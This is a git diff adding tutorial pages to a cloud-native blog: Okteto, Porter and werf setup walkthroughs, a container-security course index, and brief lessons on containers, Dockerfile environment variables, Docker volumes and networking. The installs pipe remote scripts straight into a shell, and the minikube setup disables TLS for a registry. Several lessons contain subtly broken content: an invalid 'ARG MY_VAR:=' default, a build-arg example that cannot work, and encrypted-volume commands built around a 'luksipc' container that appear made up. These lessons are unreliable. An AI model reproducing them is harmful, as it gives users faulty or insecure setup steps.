+### Deploy Ngnix 2048 game app + +```bash +➜ Okteto-2048 git:(main) βœ— kubectl apply -f 2048.yaml +deployment.apps/nginx-deployment unchanged +service/nginx-service configured +➜ Okteto-2048 git:(main) βœ— kubectl apply -f 2048.yaml +deployment.apps/nginx-deployment configured +service/nginx-service configured +``` + +### check it out endpoint + +https://nginx-service-sangam14.cloud.okteto.net + +![](./2048-k8s.png) + + +### Automate Inner loops +okteto manefist allow developer to execute as workflow as well as its +``` +build: + nginx-deployment: + image: docker.io/sangam14/okteto-2048-game:okteto + context: . +deploy: +- kubectl apply -f 2048.yaml +``` + +// active developement mode on container +``` +dev: + nginx-deployment: + command: bash + sync: + - 2048/:/usr/share/nginx/html + interface: 0.0.0.0 + forward: + - 80:80 + +``` + +### Build and Deploy Okteto App + +``` +➜ Okteto-2048 git:(main) βœ— okteto deploy --build + i Using sangam14 @ cloud.okteto.com as context + i Building 'Dockerfile' in tcp://buildkit.cloud.okteto.net:443... 
+[+] Building 8.0s (8/8) FINISHED + => [internal] load .dockerignore 0.6s + => => transferring context: 2B 0.5s + => [internal] load build definition from buildkit-576543900 0.9s + => => transferring dockerfile: 179B 0.8s + => [internal] load metadata for docker.io/library/nginx:latest 1.8s + => [1/3] FROM docker.io/library/nginx@sha256:2ab30d6ac53580a6db8b657abf0f68d75360ff5cc1670a85acb5bd85ba1b19c0 0.0s + => => resolve docker.io/library/nginx@sha256:2ab30d6ac53580a6db8b657abf0f68d75360ff5cc1670a85acb5bd85ba1b19c0 0.0s + => [internal] load build context 2.5s + => => transferring context: 604.24kB 2.4s + => CACHED [2/3] RUN chmod +x /usr/sbin/nginx 0.0s + => [3/3] COPY 2048 /usr/share/nginx/html 0.2s + => exporting to image 2.2s + => => exporting layers 0.1s + => => exporting manifest sha256:e7348f570cd90c473ff5e0707836843c092fb458809d211b8903ac2313725399 0.0s + => => exporting config sha256:67e7d8f2c044e9aa85651fdff97f15477cf7f32372315f94ef6c1d498f408fbf 0.0s + => => pushing layers 1.9s + => => pushing manifest for docker.io/sangam14/okteto-2048-game:okteto@sha256:e7348f570cd90c473ff5e0707836843c092fb 0.2s + βœ“ Image 'docker.io/sangam14/okteto-2048-game:okteto' successfully pushed + i Running 'kubectl apply -f 2048.yaml' +deployment.apps/nginx-deployment configured +service/nginx-service configured + +``` + +### Build and Deploy Okteto App + + + +``` +➜ Okteto-2048 git:(main) βœ— okteto up nginx-deployment + i Using sangam14 @ cloud.okteto.com as context + i Images were already built. To rebuild your images run 'okteto build' or 'okteto deploy --build' + i Running 'kubectl apply -f 2048.yaml' +deployment.apps/nginx-deployment unchanged +service/nginx-service configured + i Images were already built. To rebuild your images run 'okteto build' or 'okteto deploy --build' + βœ“ Client certificates generated +Installing dependencies... +syncthing-macos-arm64-v1.23.1.zip 9.38 MiB / 9.38 MiB [-------------------------------------------] 100.00% 10.11 MiB p/s + βœ“ Dependencies successfully installed + i '.stignore' doesn't exist in folder '/Users/sangambiradar/Documents/GitHub/Okteto-2048/2048'. + i Okteto requires a '.stignore' file to ignore file patterns that help optimize the synchronization service. + ? Do you want to infer defaults for the '.stignore' file? (otherwise, it will be left blank) [Y/n]: y + βœ“ Persistent volume successfully attached + βœ“ Images successfully pulled + βœ“ Files synchronized + Context: cloud.okteto.com + Namespace: sangam14 + Name: nginx-deployment + Forward: 8080 -> 8081 + +root@nginx-deployment-okteto-6ff5f788c4-59wwn:/# ls +bin dev docker-entrypoint.sh home lib64 mnt proc run srv tmp var +boot docker-entrypoint.d etc lib media opt root sbin sys usr +root@nginx-deployment-okteto-6ff5f788c4-59wwn:/# cd usr/share/nginx/html +root@nginx-deployment-okteto-6ff5f788c4-59wwn:/usr/share/nginx/html# ls +CONTRIBUTING.md favicon.ico index.html js meta style +root@nginx-deployment-okteto-6ff5f788c4-59wwn:/usr/share/nginx/html# cat index.html + + + + + 2048 on Okteto Cloud + + + + + + + + + + + + + + +
+2048
+0   0
+Join the numbers and get to the 2048 tile!
+New Game
+How to play: Use your arrow keys to move the tiles. When two tiles with the same number touch, they merge into one!
+Note: This site is the official version of 2048. You can play it on your phone via http://git.io/2048. All other apps or sites are derivatives or fakes, and should be used with caution.
+Created by Gabriele Cirulli. Based on 1024 by Veewo Studio and conceptually similar to Threes by Asher Vollmer.
+root@nginx-deployment-okteto-6ff5f788c4-59wwn:/usr/share/nginx/html# touch index1.html
+root@nginx-deployment-okteto-6ff5f788c4-hkv5v:/usr/share/nginx/html# echo "sangam" > index1.html
+root@nginx-deployment-okteto-6ff5f788c4-hkv5v:/usr/share/nginx/html# cat index1.html
+sangam
+```
+### You can see the change on your endpoint
+
+https://nginx-service-sangam14.cloud.okteto.net/index1.html
+
+![](./index1.png)
+
+GitHub source code for the above demo:
+{{< rawhtml >}}
+{{< /rawhtml >}} + +Join [CloudNativeFolks Community](https://discord.gg/rEvr7vq) or Reach out to me on twitter [@sangamtwts](https://twitter.com/sangamtwts) + diff --git a/content/en/blog/okteto/index1 2.png b/content/en/blog/okteto/index1 2.png new file mode 100644 index 0000000..fab0e0a Binary files /dev/null and b/content/en/blog/okteto/index1 2.png differ diff --git a/content/en/blog/okteto/okteto 2.png b/content/en/blog/okteto/okteto 2.png new file mode 100644 index 0000000..24ab1a4 Binary files /dev/null and b/content/en/blog/okteto/okteto 2.png differ diff --git a/content/en/blog/okteto/okteto-2048-game 2.png b/content/en/blog/okteto/okteto-2048-game 2.png new file mode 100644 index 0000000..f8399e5 Binary files /dev/null and b/content/en/blog/okteto/okteto-2048-game 2.png differ diff --git a/content/en/blog/okteto/okteto-UI 2.png b/content/en/blog/okteto/okteto-UI 2.png new file mode 100644 index 0000000..8f6f25a Binary files /dev/null and b/content/en/blog/okteto/okteto-UI 2.png differ diff --git a/content/en/blog/okteto/okteto-login 2.png b/content/en/blog/okteto/okteto-login 2.png new file mode 100644 index 0000000..008b734 Binary files /dev/null and b/content/en/blog/okteto/okteto-login 2.png differ diff --git a/content/en/blog/porter/readme 2.md b/content/en/blog/porter/readme 2.md new file mode 100644 index 0000000..2699161 --- /dev/null +++ b/content/en/blog/porter/readme 2.md @@ -0,0 +1,40 @@ +--- +title : Porter - Create an installer bundling your application, client tools, configuration, and deployment logic for easy distribution and execution with a single command +author : Sangam Biradar +categories : + - Kubernetes +weight : 50 +description : Cloud Native Bundle for Developer +draft : false +Date : 2023-02-18 +author : Sangam Biradar +--- + + +#### Porter - Create an installer bundling your application, client tools, configuration, and deployment logic for easy distribution and execution with a single command + +Porter is a CNCF project implementing the CNAB specification. It provides a CLI and Kubernetes Operator to create, publish, install, and maintain CNABs. Porter provides a consistent, platform-agnostic way to deploy and manage cloud native applications, making it easier to automate and manage the lifecycle of your applications + + - CNAB, or Cloud-Native Application Bundle, is an open standard for packaging and distributing cloud-native applications and their dependencies across various platforms. It simplifies the deployment process, enhances security through digital signatures, and promotes interoperability across different environments, making it easier to manage complex cloud-native applications. + + +#### Install Porter + +``` +➜ export VERSION="v1.0.14" +curl -L https://cdn.porter.sh/$VERSION/install-mac.sh | bash + % Total % Received % Xferd Average Speed Time Time Time Current + Dload Upload Total Spent Left Speed + 0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0 +100 1204 100 1204 0 0 518 0 0:00:02 0:00:02 --:--:-- 2787 +Installing porter@v1.0.14 to /Users/sangambiradar/.porter from https://cdn.porter.sh +Installed porter v1.0.14 (0e739d88) +installed exec mixin v1.0.14 (0e739d88) +Installation complete. 
+Add porter to your path by adding the following line to your ~/.bash_profile or ~/.zprofile and open a new terminal: +export PATH=$PATH:~/.porter +➜ export PATH=$PATH:~/.porter +``` + +#### Initialize a New Porter Project + diff --git a/content/en/blog/werf/docker-desk 2.png b/content/en/blog/werf/docker-desk 2.png new file mode 100644 index 0000000..48c7f9d Binary files /dev/null and b/content/en/blog/werf/docker-desk 2.png differ diff --git a/content/en/blog/werf/index 2.md b/content/en/blog/werf/index 2.md new file mode 100644 index 0000000..41725f6 --- /dev/null +++ b/content/en/blog/werf/index 2.md @@ -0,0 +1,345 @@ +--- +title : Werf A solution for implementing efficient and consistent software +author : Sangam Biradar +categories : + - Kubernetes +weight : 60 +description : Reduce Inner Loop focus on Developing Application +draft : false +Date : 2023-02-19 +author : Sangam Biradar +--- + +{{< rawhtml >}} +
+
+{{< /rawhtml >}} +#### Install Werf + + + +```bash +➜ ~ curl -sSLO https://werf.io/install.sh && chmod +x install.sh +➜ ~ ./install.sh --version 1.2 --channel stable +[INPUT REQUIRED] Current login shell is "zsh". Press ENTER to setup werf for this shell or choose another one. +[b]ash/[z]sh/[a]bort? Default: zsh. +z +[INPUT REQUIRED] trdl is going to be installed in "/Users/sangambiradar/bin/". Add this directory to your $PATH in "/Users/sangambiradar/.zshrc" and "/Users/sangambiradar/.zprofile"? (strongly recommended) +[y]es/[a]bort/[s]kip? Default: yes. +yes +[INFO] Installing trdl to "/Users/sangambiradar/bin/". + +[INFO] Adding werf repo to trdl. +[INPUT REQUIRED] Add automatic werf activation to "/Users/sangambiradar/.zshrc" and "/Users/sangambiradar/.zprofile"? (recommended for interactive usage, not recommended for CI) +[y]es/[a]bort/[s]kip? Default: yes. +[INFO] werf installation finished successfully! +[INFO] Open new shell session if you have enabled werf autoactivation or activate werf manually with: +$ source $("/Users/sangambiradar/bin/trdl" use werf "1.2" "stable") +``` + +### werf use trdl + +trdl is an Open Source solution providing a secure channel for delivering updates from the Git repository to the end user. + + +![](./trdl.png) + +Problems that trdl solves for you +- Continuous delivery limitations + - Continuous delivery via the CI system works well for the SaaS model, that is, for software + - hosted on cloud servers. At the same time, you would be hard-pressed to find a tool that is as fast at delivering code to user devices. + +- Challenges related to implementing a secure delivery + - What complicates things: + - Software release and changes in release channels must only occur based on a collective decision of the team (quorum). + - The system must protect against unauthorized access and data compromise. + - The system must not be compromised by human mistakes, including regulation breaches. + +- Package manager limitations + - There are many package managers, but they all have common drawbacks: + - Each platform requires its own manager. + - The package creation process is complicated. + - There is a lot of manual work involved: the user has to add the package source, find the package, and install/upgrade/uninstall it. + + + +### verify werf cli installed or not + +``` +➜ ~ werf +werf helps to implement and support Continuous Integration and Continuous +Delivery. + +Find more information at https://werf.io + +Delivery commands: + converge Build and push images, then deploy application into Kubernetes + dismiss Delete werf release from Kubernetes + bundle Work with werf bundles: publish bundles into container + registry and deploy bundles into Kubernetes cluster + +Cleaning commands: + cleanup Cleanup project images in the container registry + purge Purge all project images in the container registry + +Helper commands: + ci-env Generate werf environment variables for specified CI system + build Build images + export Export images + run Run container for project image + kube-run Run container for project image in Kubernetes + compose Work with docker-compose + slugify Print slugged string by specified format. 
+ render Render Kubernetes templates + +Low-level management commands: + config Work with werf.yaml + managed-images Work with managed images which will be preserved during + cleanup procedure + host Work with werf cache and data of all projects on the host + machine + helm Manage application deployment with helm + cr Work with container registry: authenticate, list and remove + images, etc. + kubectl kubectl controls the Kubernetes cluster manager + +Other commands: + synchronization Run synchronization server + completion Generate bash completion scripts + version Print version + +Use "werf --help" for more information about a given command. + +Version: v1.2.205 +➜ ~ +``` +### Setup Minikube for Werf + +``` + ~ minikube start --vm=true --insecure-registry registry.example.com:80 +πŸ˜„ minikube v1.30.0 on Darwin 13.3 (arm64) +✨ Automatically selected the qemu2 driver. Other choices: virtualbox, ssh +🌐 Automatically selected the builtin network +❗ You are using the QEMU driver without a dedicated network, which doesn't support `minikube service` & `minikube tunnel` commands. +To try the dedicated network see: https://minikube.sigs.k8s.io/docs/drivers/qemu/#networking +πŸ’Ώ Downloading VM boot image ... + > minikube-v1.30.0-arm64.iso....: 65 B / 65 B [---------] 100.00% ? p/s 0s + > minikube-v1.30.0-arm64.iso: 330.67 MiB / 330.67 MiB 100.00% 16.06 MiB p +πŸ‘ Starting control plane node minikube in cluster minikube +πŸ’Ύ Downloading Kubernetes v1.26.3 preload ... + > preloaded-images-k8s-v18-v1...: 330.52 MiB / 330.52 MiB 100.00% 16.66 M +πŸ”₯ Creating qemu2 VM (CPUs=2, Memory=4000MB, Disk=20000MB) ... +🐳 Preparing Kubernetes v1.26.3 on Docker 20.10.23 ... + β–ͺ Generating certificates and keys ... + β–ͺ Booting up control plane ... + β–ͺ Configuring RBAC rules ... +πŸ”— Configuring bridge CNI (Container Networking Interface) ... + β–ͺ Using image gcr.io/k8s-minikube/storage-provisioner:v5 +πŸ”Ž Verifying Kubernetes components... +🌟 Enabled addons: storage-provisioner, default-storageclass +πŸ„ Done! kubectl is now configured to use "minikube" cluster and "default" namespace by default + +``` +`--insecure-registry` allows usage of Container Registry without TLS. + +### add on NGINX Ingress Controller & Container Registry to store images : + +``` +➜ ~ minikube addons enable ingress +πŸ’‘ ingress is an addon maintained by Kubernetes. For any concerns contact minikube on GitHub. +You can view the list of minikube maintainers at: https://github.com/kubernetes/minikube/blob/master/OWNERS + β–ͺ Using image registry.k8s.io/ingress-nginx/kube-webhook-certgen:v20230312-helm-chart-4.5.2-28-g66a760794 + β–ͺ Using image registry.k8s.io/ingress-nginx/controller:v1.7.0 + β–ͺ Using image registry.k8s.io/ingress-nginx/kube-webhook-certgen:v20230312-helm-chart-4.5.2-28-g66a760794 +πŸ”Ž Verifying ingress addon... +🌟 The 'ingress' addon is enabled +➜ ~ minikube addons enable registry +πŸ’‘ registry is an addon maintained by Google. For any concerns contact minikube on GitHub. +You can view the list of minikube maintainers at: https://github.com/kubernetes/minikube/blob/master/OWNERS + β–ͺ Using image gcr.io/google_containers/kube-registry-proxy:0.4 + β–ͺ Using image docker.io/registry:2.8.1 +πŸ”Ž Verifying registry addon... 
+🌟 The 'registry' addon is enabled +``` + +### Create Ingress to access Container Registry: + +``` +ubectl apply -f - << EOF +--- +apiVersion: networking.k8s.io/v1 +kind: Ingress +metadata: + name: registry + namespace: kube-system + annotations: + nginx.ingress.kubernetes.io/proxy-body-size: "0" +spec: + rules: + - host: registry.example.com + http: + paths: + - path: / + pathType: Prefix + backend: + service: + name: registry + port: + number: 80 +EOF + +``` + +### Allow usage of Container Registry without TLS for docker: + + +``` +{ + "insecure-registries" : ["registry.example.com:80"] +} +``` +add above configuration key +![](./docker-desk.png) + +``` +➜ ~ minikube start --vm=true --insecure-registry registry.example.com:80 +πŸ˜„ minikube v1.30.0 on Darwin 13.3 (arm64) +✨ Using the qemu2 driver based on existing profile +πŸ‘ Starting control plane node minikube in cluster minikube +πŸƒ Updating the running qemu2 "minikube" VM ... +🐳 Preparing Kubernetes v1.26.3 on Docker 20.10.23 ... +πŸ”Ž Verifying ingress addon... + β–ͺ Using image docker.io/registry:2.8.1 +πŸ”Ž Verifying Kubernetes components... + β–ͺ Using image gcr.io/google_containers/kube-registry-proxy:0.4 +πŸ”Ž Verifying registry addon... +🌟 Enabled addons: storage-provisioner, ingress, default-storageclass, registry +πŸ„ Done! kubectl is now configured to use "minikube" cluster and "default" namespace by default + +``` + +### update hostfile and registry name + +``` + ~ echo "$(minikube ip) vote.quickstart-application.example.com result.quickstart-application.example.com registry.example.com" | sudo tee -a /etc/hosts +Password: +10.0.2.15 vote.quickstart-application.example.com result.quickstart-application.example.com registry.example.com +~ minikube ssh -- "echo $(minikube ip) registry.example.com | sudo tee -a /etc/hosts" +10.0.2.15 registry.example.com + +``` + +### lets test out simple voting app + +``` +➜ ~ git clone https://github.com/werf/quickstart-application +cd quickstart-application +Cloning into 'quickstart-application'... +remote: Enumerating objects: 1279, done. +remote: Total 1279 (delta 0), reused 0 (delta 0), pack-reused 1279 +Receiving objects: 100% (1279/1279), 1.05 MiB | 5.09 MiB/s, done. +Resolving deltas: 100% (515/515), done. 
+ +``` + +#### we have voting , result and working dockerfile in werf.yaml + +``` + quickstart-application git:(main) cat werf.yaml +configVersion: 1 +project: quickstart-application +--- +image: vote +dockerfile: Dockerfile +context: vote +--- +image: result +dockerfile: Dockerfile +context: result +--- +image: worker +dockerfile: Dockerfile +context: worker + +``` + +### werf converge + +``` +werf converge --repo registry.example.com:80/quickstart-application +Version: v1.2.205 +Using werf config render file: /private/var/folders/xy/3ssjv1j152x3_0ryt4yb982c0000gn/T/werf-config-render-1406655825 + +β”Œ Concurrent builds plan (no more than 5 images at the same time) +β”‚ Set #0: +β”‚ - β›΅ image vote +β”‚ - β›΅ image result +β”‚ - β›΅ image worker +β”” Concurrent builds plan (no more than 5 images at the same time) + +β”Œ β›΅ image vote +β”‚ β”Œ Copy suitable stage from secondary :local +β”‚ β”‚ Use cache image for vote/dockerfile +β”‚ β”‚ name: registry.example.com:80/quickstart-application:08900098c0a1a06586f8909a6b77927db90bbd21b5a089330ccd6e35-1680637511061 +β”‚ β”‚ id: 2cb9949aa002 +β”‚ β”‚ created: 2023-04-05 01:15:10 +0530 IST +β”‚ β”‚ size: 51.2 MiB +β”‚ β”” Copy suitable stage from secondary :local (33.85 seconds) +β”” β›΅ image vote (111.86 seconds) + +β”Œ β›΅ image result +β”‚ β”Œ Copy suitable stage from secondary :local +β”‚ β”‚ Use cache image for result/dockerfile +β”‚ β”‚ name: registry.example.com:80/quickstart-application:78557a576585e3acba6868f3d28b70b601affb6364e377918b355f8b-1680637519961 +β”‚ β”‚ id: c14efe2c5cae +β”‚ β”‚ created: 2023-04-05 01:15:19 +0530 IST +β”‚ β”‚ size: 53.0 MiB +β”‚ β”” Copy suitable stage from secondary :local (43.51 seconds) +β”” β›΅ image result (91.21 seconds) + +β”Œ β›΅ image worker +β”‚ β”Œ Copy suitable stage from secondary :local +β”‚ β”‚ Use cache image for worker/dockerfile +β”‚ β”‚ name: registry.example.com:80/quickstart-application:f5eab243c67a973041e7f92ee9f5ff39d0d671536814a10bac957e82-1680637550923 +β”‚ β”‚ id: 74a6e53feb05 +β”‚ β”‚ created: 2023-04-05 01:15:50 +0530 IST +β”‚ β”‚ size: 74.2 MiB +β”‚ β”” Copy suitable stage from secondary :local (33.76 seconds) +β”” β›΅ image worker (96.56 seconds) + +Release "quickstart-application" does not exist. Installing it now. 
+ +β”Œ Waiting for resources to become ready +β”‚ β”Œ Status progress +β”‚ β”‚ DEPLOYMENT REPLICAS AVAILABLE UP-TO-DATE +β”‚ β”‚ db 1/1 0 1 +β”‚ β”‚ β”‚ POD READY RESTARTS STATUS --- +β”‚ β”‚ └── 6676664f7d-sz6ct 0/1 0 ContainerCreating Waiting for: available 0->1 +β”‚ β”‚ redis 1/1 0 1 +β”‚ β”‚ result 1/1 0 1 +β”‚ β”‚ vote 1/1 0 1 ↡ +β”‚ β”‚ +β”‚ β”‚ worker 1/1 0 1 +β”‚ β”‚ β”‚ POD READY RESTARTS STATUS --- +β”‚ β”‚ └── 77b4769cd4-qlhkm 0/1 0 ContainerCreating Waiting for: available 0->1 +β”‚ β”‚ RESOURCE NAMESPACE CONDITION: CURRENT (DESIRED) +β”‚ β”‚ Service/vote quickstart-application - +β”‚ β”‚ Service/db quickstart-application - +β”‚ β”‚ Service/redis quickstart-application - +β”‚ β”‚ Service/result quickstart-application - ↡ +β”‚ β”‚ +β”‚ β”‚ Ingress/quickstart-application quickstart-application - +β”‚ β”” Status progress +β”‚ + +``` + +you will see results +- Go to the following URL to vote: vote.quickstart-application.example.com +- Go to the following URL to check the result of voting: result.quickstart-application.example.com + + +for more example check it out : https://werf.io/documentation/v1.2/usage/deploy/overview.html + + +Join [CloudNativeFolks Community](https://discord.gg/rEvr7vq) or Reach out to me on twitter [@sangamtwts](https://twitter.com/sangamtwts) diff --git a/content/en/blog/werf/trdl 2.png b/content/en/blog/werf/trdl 2.png new file mode 100644 index 0000000..1333a4a Binary files /dev/null and b/content/en/blog/werf/trdl 2.png differ diff --git a/content/en/blog/werf/werf 2.png b/content/en/blog/werf/werf 2.png new file mode 100644 index 0000000..bef5fd7 Binary files /dev/null and b/content/en/blog/werf/werf 2.png differ diff --git a/content/en/containersecurity/_overview 2.md b/content/en/containersecurity/_overview 2.md new file mode 100644 index 0000000..7d04db3 --- /dev/null +++ b/content/en/containersecurity/_overview 2.md @@ -0,0 +1,43 @@ +--- +title: Container Security +url: "containersecurity/overview" +aliases: +- "/containersecurity" +--- + +### Table of Content +| Title | Link | +| --------- | ------- | +| 1.What is container? |[lab](https://kubedaily.com/docs/0.0.1/container-security/what-is-container/) | +|2.Container vs. 
Virtualization|[lab](https://kubedaily.com/docs/0.0.1/container-security/containervsvm/)|
+|3.Container Advantage and Disadvantages| [lab](https://kubedaily.com/docs/0.0.1/container-security/container-adv-dis/)|
+|4.Namespaces| [lab](https://kubedaily.com/docs/0.0.1/container-security/namespaces/)|
+|5.Cgroups|[lab](https://kubedaily.com/docs/0.0.1/container-security/cgroup/) |
+|6.Capabilities|[lab](https://kubedaily.com/docs/0.0.1/container-security/capabilities/) |
+|7.Docker architecture and its components|[lab](https://kubedaily.com/docs/0.0.1/container-security/docker-architecture/) |
+|8.Interacting with container ecosystem|[lab](https://kubedaily.com/docs/0.0.1/container-security/intracting-with-container/) |
+|9.Attack surface of the container ecosystem| [lab](https://kubedaily.com/docs/0.0.1/container-security/attack-surface/) |
+|10.Environment variables|[lab](https://kubedaily.com/docs/0.0.1/container-security/envir-variables/) |
+|11.Docker volumes|[lab](https://kubedaily.com/docs/0.0.1/container-security/docker-volumes/) |
+|12.Docker Networking|[lab](https://kubedaily.com/docs/0.0.1/container-security/docker-networking/)|
+|13.Auditing Docker Security|[lab](https://kubedaily.com/docs/0.0.1/container-security/auditing-docker-sec/) |
+|14.Container Image Security|[lab](https://kubedaily.com/docs/0.0.1/container-security/container-image-security/) |
+|15.Dockerfile Security Best Practices|[lab](https://kubedaily.com/docs/0.0.1/container-security/dockerfile-security/) |
+|16.SecretScanner - Finding secrets and passwords in container images and file systems | [lab](https://kubedaily.com/docs/0.0.1/container-security/secretscanner/)|
+|17.YaraHunter - Malware Scanner for Container Images|[lab](https://kubedaily.com/docs/0.0.1/container-security/yarahunter/) |
+|18.Security Linting of Dockerfiles| [lab](https://kubedaily.com/docs/0.0.1/container-security/security-linting-dockerfile/)|
+|19.Static Analysis of container images/library for container|[lab](https://kubedaily.com/docs/0.0.1/container-security/packetscanner/) |
+|20.Docker host security configurations|[lab](https://kubedaily.com/docs/0.0.1/container-security/seccomp-apparmor/) |
+|21.Docker Daemon security configurations|[lab](https://kubedaily.com/docs/0.0.1/container-security/docker-daemon-sec/) |
+|22.Content Trust and Integrity checks|[lab](https://kubedaily.com/docs/0.0.1/container-security/dct/) |
+|23.Docker Registry security configurations|[lab](https://kubedaily.com/docs/0.0.1/container-security/docker-registry/) |
+|24.DockerScan|[lab](https://kubedaily.com/docs/0.0.1/container-security/dockerscan/) |
+|25.Dive|[lab](https://kubedaily.com/docs/0.0.1/container-security/dive/) |
+|26.Scanning Docker for vulnerabilities with ThreatMapper|[lab](https://kubedaily.com/docs/0.0.1/container-security/threatmapper-app/) |
+|27.Docker events|[lab](https://kubedaily.com/docs/0.0.1/container-security/docker-events/) |
+|28.Sock Shop Docker Compose & Weave|[lab](https://kubedaily.com/docs/0.0.1/container-security/sock-shop-weave/)|
+
+
+What's next?
+
+- [Kubernetes Workshop](https://kubedaily.com/docs/0.0.1/k8s/) diff --git a/content/en/containersecurity/b1.what-is-container 2.md b/content/en/containersecurity/b1.what-is-container 2.md new file mode 100644 index 0000000..ed76a21 --- /dev/null +++ b/content/en/containersecurity/b1.what-is-container 2.md @@ -0,0 +1,72 @@
+---
+title: "What is a container?"
+description: "The introduction to this course."
+slug: "what-is-container?"
+---
+
+
+> What is a container?
+
+- A container is a full package, or grouping, of an application's entire runtime environment, including its binaries, the runtime needed to run the application, system tools, system libraries, settings, and configuration.
+
+That is the definition that comes to mind when you first learn about containers. To understand it better, we need to go back to operating system basics and how they work.
+
+When a program/process is running on your computer, it makes a system call to the kernel whenever it needs to access any of the hardware resources, such as:
+
+  - memory
+  - file system (hard disk)
+  - CPU cycles
+  - Internet
+  - bandwidth and I/O
+  - user permissions and privileges, etc.
+
+![](./images/OS-working.png)
+
+> What if we want to isolate a single program to run in its own virtual space or environment?
+
+Let’s say I want to run Chrome in a virtual environment within the machine with its own CPU cycles, memory, hard disk space, bandwidth, users, Internet usage, etc.
+
+Something like what is shown in the following picture: a marked space or group.
+
+![](./images/OS-working-1.jpg)
+
+Is it possible? Yes, it is.
+
+> Isolating the system resources per process, or group of processes, is called namespacing, and limiting and regulating the system resources allocated to the isolated process/processes is done with control groups (cgroups).
+
+> A combined product of control groups and namespacing, with process-level isolation, is what we call containerization, or a container.
+
+> To be more clear: in the preceding diagram, the area or grouping marked in red dotted lines is called a container.
+
+The following diagram explains what namespacing and control groups are and their scope of responsibilities.
+
+![](./images/cgroup-namespace.png)
+
+What is inside a container?
+
+As we said just before, a container is a collection of the following elements:
+
+- Program binaries/configuration
+- Runtime libraries
+- Dependency products/tools
+- A piece of the kernel
+- System resources
+  - Hard disk
+  - Memory
+  - I/O
+  - Network
+  - CPU
+
+![](./images/container-skeleton.png)
+
+Because we isolate the program and dedicate its own system resources and runtime libraries to it, it can run alone as a standalone application (or piece of infrastructure).
+
+![](./images/tenor.gif)
+
+β€œIt was working fine on my laptop or machine”
+
+"Yes, it might have worked on the laptop (or in DEV), but that’s not enough for it to work in PROD, or at least not the same way it’s working in DEV."
+
+
+ diff --git a/content/en/containersecurity/b10.Envir-variables 2.md b/content/en/containersecurity/b10.Envir-variables 2.md new file mode 100644 index 0000000..59eca66 --- /dev/null +++ b/content/en/containersecurity/b10.Envir-variables 2.md @@ -0,0 +1,46 @@
+---
+title: "Environment variables"
+description: "Environment variables"
+slug: "Environment-variables"
+---
+
+Here is an example of using an environment variable in a Dockerfile:
+
+```
+FROM alpine:latest
+# Set an environment variable
+ENV MY_VAR "Hello World"
+# Create the target directory and use the environment variable in a command
+RUN mkdir -p /app && echo $MY_VAR > /app/output.txt
+CMD ["cat", "/app/output.txt"]
+```
+
+In this example, the environment variable MY_VAR is set to the value "Hello World". This variable is then used in the RUN command to create an output.txt file with the contents "Hello World".
+
+To build the Docker image using this Dockerfile, you can use the following command:
+
+```
+docker build -t my-image .
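+# Optional check (assumed follow-up, reusing the image name built above):
+# running the image prints the value that was baked in via ENV at build time.
+docker run --rm my-image    # expected output: Hello World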
+``` + +You can also set the value of the environment variable when you build the image using the `--build-arg` flag: + +``` +docker build -t my-image --build-arg MY_VAR=Goodbye . +``` + +This will set the value of MY_VAR to "Goodbye" when the image is built. + +It is also a good idea to use default values for environment variables in your Dockerfile. This way, if the variable is not set when the image is built, it will use the default value. You can do this by using the ARG directive in your Dockerfile and then using the := operator to set the default value: + +``` +FROM alpine:latest +# Set a default value for the environment variable +ARG MY_VAR:=Hello World +# Use the environment variable in a command +RUN echo $MY_VAR > /app/output.txt +CMD ["cat", "/app/output.txt"] +``` + +In this example, if the value of MY_VAR is not set when the image is built, it will default to the value "Hello World". diff --git a/content/en/containersecurity/b11.Docker-volumes 2.md b/content/en/containersecurity/b11.Docker-volumes 2.md new file mode 100644 index 0000000..b50a3ba --- /dev/null +++ b/content/en/containersecurity/b11.Docker-volumes 2.md @@ -0,0 +1,41 @@ +--- +title: "Docker volumes " +slug: "docker-volumes" +--- + +Docker volumes +# How to create encrypted data volume + + +Create a Docker volume using the docker volume create command, for example: + +``` +$ docker volume create encrypted_volume +``` + +Create a Docker container that will be used to create the encrypted volume. For this, you can use a tool like luksipc, which allows you to create a LUKS-encrypted file within a container. + +Run the `luksipc`container with the `--volume` flag to specify the Docker volume you want to encrypt. For example: + +``` +$ docker run --rm -it --volume encrypted_volume:/volume luksipc create +``` + +Follow the prompts to create the encrypted volume. You will be asked to specify a passphrase that will be used to encrypt and decrypt the volume. + +Once the volume is created, you can use it like any other Docker volume. For example, you can mount it to a container using the -v flag: + +``` +$ docker run --rm -it -v encrypted_volume:/data ubuntu bash + +``` + +To decrypt the volume, you can use the `luksipc` container again and specify the unlock command. You will be prompted for the passphrase you specified when creating the volume: + +``` +$ docker run --rm -it --volume encrypted_volume:/volume luksipc unlock + +``` + +You can then access the decrypted data within the volume from within the container. +Note: This is just one example of how to create an encrypted Docker volume. There are other tools and methods available that you can use to achieve the same result. 
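+
+As an alternative sketch (assuming a Linux Docker host with `cryptsetup` available; the paths, sizes, and names below are illustrative), you can encrypt the backing storage on the host with LUKS and hand the mounted directory to Docker through the `local` volume driver:
+
+```bash
+# Create a 1 GiB file-backed LUKS container on the Docker host
+dd if=/dev/zero of=/var/lib/encrypted.img bs=1M count=1024
+cryptsetup luksFormat /var/lib/encrypted.img          # you will be prompted for a passphrase
+cryptsetup open /var/lib/encrypted.img encrypted_store
+mkfs.ext4 /dev/mapper/encrypted_store
+mkdir -p /mnt/encrypted && mount /dev/mapper/encrypted_store /mnt/encrypted
+
+# Expose the encrypted mount point to Docker as a named volume (bind via the local driver)
+docker volume create --driver local \
+  --opt type=none --opt o=bind --opt device=/mnt/encrypted encrypted_volume
+
+# Containers that mount this volume now write data that is encrypted at rest on the host
+docker run --rm -it -v encrypted_volume:/data ubuntu bash
+```
+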
diff --git a/content/en/containersecurity/b12.Docker-Networking 2.md b/content/en/containersecurity/b12.Docker-Networking 2.md new file mode 100644 index 0000000..9f83465 --- /dev/null +++ b/content/en/containersecurity/b12.Docker-Networking 2.md @@ -0,0 +1,90 @@
+---
+title: "Docker Networking"
+description: "Docker Networking"
+slug: "docker-networking"
+---
+
+## Docker Networking
+
+The Container Network Model (CNM) is the design document for Docker networking. It is implemented by 'libnetwork', written in Go, and defines three building blocks:
+
+- Sandbox - an isolated network stack
+- Endpoint - a virtual Ethernet interface
+- Network - a virtual switch (bridge)
+
+
+Note - libnetwork implements the control and management plane functions, while the network-specific drivers implement the data plane and handle connectivity and isolation.
+
+
+# Docker Native Network Drivers
+
+- Bridge - uses a software bridge which allows containers connected to the same bridge network to communicate
+
+- Host - removes network isolation so that containers use the host's networking directly
+
